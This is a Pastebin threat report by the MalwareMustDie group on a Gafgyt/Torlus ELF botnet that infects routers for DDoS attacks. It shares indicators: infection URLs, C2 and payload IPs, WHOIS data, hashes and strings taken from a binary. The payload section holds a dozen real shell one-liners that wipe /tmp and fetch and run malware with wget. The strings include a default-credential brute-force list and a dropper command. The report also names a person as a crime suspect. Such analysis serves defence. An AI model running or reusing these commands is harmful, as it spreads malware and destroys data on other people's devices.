Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _____ .__ _____ __ _______ .__
- / \ _____ | |__ _ _______ _______ ____ / \ __ __ _______/ |\____ \ |__| ____
- / \ / \\__ \ | |\ \/ \/ /\__ \\_ __ \_/ __ \ / \ / \| | \/ ___/\ __\ | \| |/ __ \
- / Y \/ __ \| |_\ / / __ \| | \/\ ___// Y \ | /\___ \ | | | ` \ \ ___/
- \____|__ (____ /____/\/\_/ (____ /__| \___ >____|__ /____//____ > |__|/__ __ /__|\___ >
- \/ \/ \/ \/ \/ \/ \/ \/
- #MalwareMustDie :: malwaremustdie.org
- ###############################
- # 0x01. Cyber crime Suspect
- ###############################
- Handle: AntiChrist/Reverse/NoHacker/etc.. | Origin: Noord Netherlands
- Verdict: Hack routers for ELF malware backddor for DDOS attack & etc malicious purpose
- a Lizard Squad loonies, and administrator of lizard stresser service.
- PoC: https://pastebin.com/raw/nweQVfN6
- Profile:
- http://malwaremustdie.org/stat/antichrist.html
- ###############################
- # 0x02. Report details
- ###############################
- New malware infrastructure in Moldova & Lithuania
- Malware variant: ELF Botnet Torlus/GayFgt/Lizard Kebab multi architecture.
- Malware / incident reference: MMD-0052-2016 - SkidDDOS ELF infection
- http://blog.malwaremustdie.org/2016/02/mmd-0052-2016-skidddos-elf-distribution.html
- #### ELF INFECTION #######
- // infection:
- http://new.updatebits.su/get.sh (185.130.5.179)
- // updates1:
- http://new.updatebits.su/cfw.sh (185.130.5.179)
- // updates2
- cf.updatebits.su (208.67.1.66)
- //CNC:
- 176.123.7.70:168
- hostname: 176-123-7-70.alexhost.md (176.123.7.70)
- Connection to 176.123.7.70 168 port [tcp/*] succeeded!
- // domain:
- domain: UPDATEBITS.SU
- nserver: amy.ns.cloudflare.com.
- nserver: art.ns.cloudflare.com.
- state: REGISTERED, DELEGATED
- person: Private Person
- e-mail: zefknot@gmx.com
- registrar: R01-REG-FID
- created: 2015.11.28
- paid-till: 2016.11.28
- free-date: 2016.12.31
- source: TCI
- #### PAYLOAD SERVER #######
- HTTP/1.1 200 OK
- Date: Sat, 27 Feb 2016 13:28:25 GMT
- Server: Apache/2.2.15 (CentOS)
- Last-Modified: Fri, 26 Feb 2016 22:13:32 GMT
- ETag: "14202b6-703-52cb39c0a08f2"
- 200 OK
- #### LOCATION ######
- {
- "ip": "185.130.5.179",
- "hostname": "new.updatebits.su",
- "city": "",
- "region": "",
- "country": "LT",
- "loc": "56.0000,24.0000",
- "org": "AS60117 Host Sailor Ltd."
- "ip": "176.123.7.70",
- "hostname": "176-123-7-70.alexhost.md",
- "city": "Chisinau",
- "region": "Municipiul Chisinau",
- "country": "MD",
- "loc": "47.0056,28.8575",
- "org": "AS200019 ALEXHOST SRL"
- "ip": "208.67.1.66",
- "hostname": "cf.updatebits.su",
- "city": "Kansas City",
- "region": "Missouri",
- "country": "US",
- "loc": "39.1472,-94.5735",
- "org": "AS33387 DataShack, LC",
- "postal": "64116"
- }
- #### PAYLOADS #######
- -------------------
- ulimit -n 712
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d11 || wget http://185.130.5.179/d11;cat d11 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d8 || wget http://185.130.5.179/d8;cat d8 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d7 || wget http://185.130.5.179/d7;cat d7 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d1 || wget http://185.130.5.179/d1;cat d1 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d2 || wget http://185.130.5.179/d2;cat d2 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d3 || wget http://185.130.5.179/d3;cat d3 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d4 || wget http://185.130.5.179/d4;cat d4 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d5 || wget http://185.130.5.179/d5;cat d5 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d6 || wget http://185.130.5.179/d6;cat d6 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d9 || wget http://185.130.5.179/d9;cat d9 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d10 || wget http://185.130.5.179/d10;cat d10 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d12 || wget http://185.130.5.179/d12;cat d12 >busybox;chmod 777 busybox;./busybox
- rm -rf /tmp/1*
- rm -rf /var/run/*
- #### BINS #######
- --------------------
- d1: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
- d10:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
- d11:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
- d12:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
- d2: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
- d3: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
- d4: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
- d5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
- d6: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, not stripped
- d7: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
- d8: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
- d9: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
- #### HASHES #######
- --------------------
- SHA1 (d1) = 7d23b5292db6f928da4e357194d83466ef177a31
- SHA1 (d10) = 09e1fecc42b9d95a5b72209b8c44656aac15133e
- SHA1 (d11) = 691f1848297cf2b79d8e7936fb57915243ff30a5
- SHA1 (d12) = b09c71710132975ebc3d5ece042664f99f270238
- SHA1 (d2) = 26eedb2f6d7a0794b4ed264f8185439421892c0a
- SHA1 (d3) = 2b1511cd39a5f5540608713a617fe0496e8cbc18
- SHA1 (d4) = 577ac74c5e28d73ab5738b1d039d2be6d9fab649
- SHA1 (d5) = e6cbd349bed899005824f63e7232b70111c73b63
- SHA1 (d6) = 047db9b9ea6e69511f7353e263518ed8c18a6168
- SHA1 (d7) = 506b499efcd2436e7863de7ce6e6aa1f62537a71
- SHA1 (d8) = 2c6863d79808801623bfd3bcce216c023004397d
- SHA1 (d9) = 4249e6fd28ee2838759f1621f4c1bd79a4b1dec2
- #### SNIPS #######
- --------------------
- .rodata:0x0805CD40 176.123.7.70:168
- .rodata:0x0805CD51 root
- .rodata:0x0805CD57 admin
- .rodata:0x0805CD5E user
- .rodata:0x0805CD64 login
- .rodata:0x0805CD6B guest
- .rodata:0x0805CD72 support
- .rodata:0x0805CD7B cisco
- .rodata:0x0805CD82 toor
- .rodata:0x0805CD88 changeme
- .rodata:0x0805CD92 1234
- .rodata:0x0805CD98 12345
- .rodata:0x0805CD9F 123456
- .rodata:0x0805CDA7 default
- .rodata:0x0805CDB0 pass
- .rodata:0x0805CDB6 password
- .rodata:0x0805CDC0 vizxv
- .rodata:0x0805CDC7 (null)
- .rodata:0x0805CDCE buf: %s\n
- .rodata:0x0805CDD7 -c
- .rodata:0x0805CDDA sh
- .rodata:0x0805CDDD /bin/sh
- .rodata:0x0805D200 /proc/cpuinfo
- .rodata:0x0805D20E BOGOMIPS
- .rodata:0x0805D217 PING
- .rodata:0x0805D21C :>%$#
- .rodata:0x0805D223 %d.%d.%d.%d
- .rodata:0x0805D22F %d.%d.%d.0
- .rodata:0x0805D23A ogin:
- .rodata:0x0805D240 \r\n
- .rodata:0x0805D243 assword:
- .rodata:0x0805D24C ncorrect
- .rodata:0x0805D255 sh\r\n
- .rodata:0x0805D25A shell\r\n
- .rodata:0x0805D264 cd /tmp || cd /var/run; rm -rf *; busybox wget http://new.updatebits.su/cfw.sh || wget http://new.updatebits.su/cfw.sh; sh cfw.sh; rm -rf cfw.sh; busybox tftp -r tft.sh -g cf.updatebits.su || tftp -r tft.sh -g cf.updatebits.su; sh tft.sh; rm -rf tft.sh\r\n
- .rodata:0x0805D364 /bin/busybox;echo -e 'gayfgt'\r\n
- .rodata:0x0805D384 ulti-call
- .rodata:0x0805D38E REPORT %s:%s:%s
- .rodata:0x0805D39E gayfgt
- .rodata:0x0805D3D8 Failed opening raw socket.
- .rodata:0x0805D3F4 Failed setting raw headers mode.
- .rodata:0x0805D415 all
- .rodata:0x0805D41B syn
- .rodata:0x0805D41F rst
- .rodata:0x0805D423 fin
- .rodata:0x0805D427 ack
- .rodata:0x0805D42B psh
- .rodata:0x0805D42F Invalid flag \”%s\”
- .rodata:0x0805D441 PONG!
- .rodata:0x0805D447 GETLOCALIP
- .rodata:0x0805D452 My IP: %s
- .rodata:0x0805D45C SCANNER
- .rodata:0x0805D464 SCANNER ON | OFF
- .rodata:0x0805D475 OFF
- .rodata:0x0805D479 ON
- .rodata:0x0805D47C FORK
- .rodata:0x0805D481 HOLD
- .rodata:0x0805D486 JUNK
- .rodata:0x0805D48B UDP
- .rodata:0x0805D48F TCP
- .rodata:0x0805D493 KILLATTK
- .rodata:0x0805D49C Killed %d.
- .rodata:0x0805D4A7 None Killed.
- .rodata:0x0805D4B4 LOLNOGTFO
- .rodata:0x0805D4BE 8.8.8.8
- .rodata:0x0805D4C6 /proc/net/route
- .rodata:0x0805D4D6 \t00000000\t
- .rodata:0x0805D4E1 [cpuset]
- .rodata:0x0805D4EA fork failed\n
- .rodata:0x0805D4F9 FAILED TO CONNECT
- .rodata:0x0805D50B PONG
- .rodata:0x0805D510 DUP
- .rodata:0x0805D514 SH
- .rodata:0x0805D517 %s 2>&1
- .rodata:0x0805D523 LINK CLOSED
- .rodata:0x0805D564 0.9.30
- .rodata:0x0805DBC8 -c
- .rodata:0x0805DBCB /bin/sh
- .rodata:0x0805DE2C /dev/null
- .rodata:0x0805DE74 clntudp_create: out of memory\n
- .rodata:0x0805DEE0 bad auth_len gid %d str %d auth %d\n
- .rodata:0x0805DF04 xdr_string: out of memory\n
- .rodata:0x0805DF1F xdr_bytes: out of memory\n
- .rodata:0x0805DF68 (nil)
- .rodata:0x0805DF6E (null)
- .rodata:0x0805DFC5 npxXoudifFeEgGaACScs
- .rodata:0x0805EB90 __get_myaddress: socket
- .rodata:0x0805EBA8 __get_myaddress: ioctl (get interface configuration)
- .rodata:0x0805EBDD __get_myaddress: ioctl
- .rodata:0x0805EBF4 Cannot register service
- .rodata:0x0805EC1C xdr_array: out of memory\n
- .rodata:0x0805EC38 /etc/resolv.conf
- .rodata:0x0805EC49 /etc/config/resolv.conf
- .rodata:0x0805EC61 nameserver
- .rodata:0x0805EC6C domain
- .rodata:0x0805EC73 search
- .rodata:0x0805EC7A %s%s%m\n
- .rodata:0x0805ED5C RPC: (unknown error code)
- .rodata:0x0805ED76 %s:
- .rodata:0x0805ED7F ; errno = %s
- .rodata:0x0805ED8C ; low version = %lu, high version = %lu
- .rodata:0x0805EDB4 ; why =
- .rodata:0x0805EDBD (unknown authentication error - %d)
- .rodata:0x0805EDE1 ; s1 = %lu, s2 = %lu
- .rodata:0x0805F1D4 %x
- .rodata:0x0805F1D7 0123456789abcdef
- .rodata:0x0805F1E8 /etc/hosts
- .rodata:0x0805F1F3 /etc/config/hosts
- ###############################
- # 0x03. Contact us for more information
- ###############################
- Twitter: @malwaremustdie (Direct Message)
- warning: your IP/location will be scanned & conversation is recorded
- Come clean & stay safe!
- #MalwareMustDie!
- [EOF]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement